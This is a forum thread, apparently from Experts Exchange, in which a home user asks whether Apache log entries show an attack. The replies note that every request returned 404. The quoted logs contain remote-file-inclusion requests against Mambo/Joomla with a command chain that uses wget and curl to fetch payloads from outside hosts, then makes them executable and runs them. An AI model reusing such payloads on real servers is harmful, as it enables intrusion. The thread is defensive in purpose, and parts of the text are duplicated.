basicinstinct
asked on
My WebServer Logs - Is this an attack?
Hi, I found wome weird entries on my webserver access logs. My webserver could only have been found by port scanning - it is running on my home PC and I use dynamic dns to locate it. It is basically just used by friends and family in other states to view pictures of my new baby son.
I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.
NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested. It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).
I'd appreciate any advice on what you think the logs indicate... Is this an attack or something innocent?
I'm running apache2.
218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_con tent&do_pd f=1&id=1in dex2.php?_ REQUEST[op tion]=com_ content&_R EQUEST[Ite mid]=1&GLO BALS=&mosC onfig_abso lute_path= http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_cont ent&do_pdf =1&id=1ind ex2.php?_R EQUEST[opt ion]=com_c ontent&_RE QUEST[Item id]=1&GLOB ALS=&mosCo nfig_absol ute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST [option]=c om_content &_REQUEST[ Itemid]=1& GLOBALS=&m osConfig_a bsolute_pa th=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
I found the following in my access log, all from an IP address in Japan, and I think it looks like someone trying to find a vulnerability in my webserver - I have obliterated part of the IP address in the extract below.
NOTE: All of the resources being requested do not exist on my site - I do not have anything like blog/ or blogs/ or any of the stuff being requested. It looks to me like someone is fishing around for some known vulnerabilities (and not finding any I hope).
I'd appreciate any advice on what you think the logs indicate... Is this an attack or something innocent?
I'm running apache2.
218.44.74.### - - [06/Apr/2006:14:06:12 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:13 +1000] "POST /blog/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:14 +1000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:16 +1000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:17 +1000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:19 +1000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:20 +1000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:21 +1000] "POST /xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:23 +1000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:24 +1000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 1016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
218.44.74.### - - [06/Apr/2006:14:06:25 +1000] "GET /index2.php?option=com_con
218.44.74.### - - [06/Apr/2006:14:06:27 +1000] "GET /index.php?option=com_cont
218.44.74.### - - [06/Apr/2006:14:06:28 +1000] "GET /mambo/index2.php?_REQUEST
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
It's not a problem, however. Note that all the responses are "404". That means what was sought was not found. If this were my server I'd simply put a block on this IP address to prevent further attempts. You could try reporting this to the ISP that handles this IP but in most cases such requests get ignored.
ASKER
Thanks for the response - the link to isc.sans.org from jss is very informative. Thanks also to jhance - I had not noticed the responses were all 404 - that's a relief. I will indeed block this IP - good idea.
I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.
Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.
Either way, I intend to contact this website and ask the to PLEASE EXPLAIN. I will also write to the ISP. It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought. Perhaps they think it makes them some sort of "l33t hacker" or something equally as silly, but they are just scriptkiddies, following the steps that someone else worked out for them. I'm upset, but I'll stop raving now.
I put the IP address of the attacker into a web browser and it came up with a legitimate website - some open source software developer company thingy.
Either the attacker originates from there, or I suppose it is more likely that the attacker has already compromised that webserver and is using it to relay attacks.
Either way, I intend to contact this website and ask the to PLEASE EXPLAIN. I will also write to the ISP. It is really disappointing - all I want to do is let dear old granny see pictures and videos of her new grandson, and someone out there tries to destroy this without giving it a second thought. Perhaps they think it makes them some sort of "l33t hacker" or something equally as silly, but they are just scriptkiddies, following the steps that someone else worked out for them. I'm upset, but I'll stop raving now.